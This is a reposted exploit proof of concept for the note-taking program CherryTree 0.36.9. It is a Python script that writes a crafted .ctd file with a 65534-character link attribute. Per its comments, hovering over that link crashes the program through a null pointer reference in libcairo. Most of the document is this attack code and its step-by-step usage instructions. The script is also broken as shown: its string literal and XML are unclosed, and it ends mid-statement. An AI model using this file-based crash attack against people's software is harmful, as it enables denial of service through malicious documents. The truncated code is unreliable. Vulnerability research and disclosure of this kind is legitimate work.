CherryTree 0.36.9 – Memory Corruption (PoC)

  • 作者: n30m1nd
    日期: 2016-10-27
  • 类别:
  • 来源:
  • #!/usr/bin/python
    ### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ### 
    # Date: 2016-10-27
    # PoC Author: n30m1nd
    # Vendor Homepage:
    # Software Link:
    # Version: Affects all versions of CherryTree prior to 0.37.6
    # Tested on: Win7 64bit and Win10 64 bit
    # Credits
    # =======
    # Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.
    # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
    # How to
    # ======
    # * Run this python script. It will generate a "PoC-1.ctd" file.
    # * Open the file and hover over the link.
    # Bonus
    # =====
    # It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)
    # Why?
    # ====
    # For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when
    # trying to draw the contents of the graphical bitmaps.
    # Exploit code
    # ============
    crashfile = '''<?xml version="1.0" ?>
    <node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">
    <rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>
    with open("PoC-1.ctd", 'w') as f: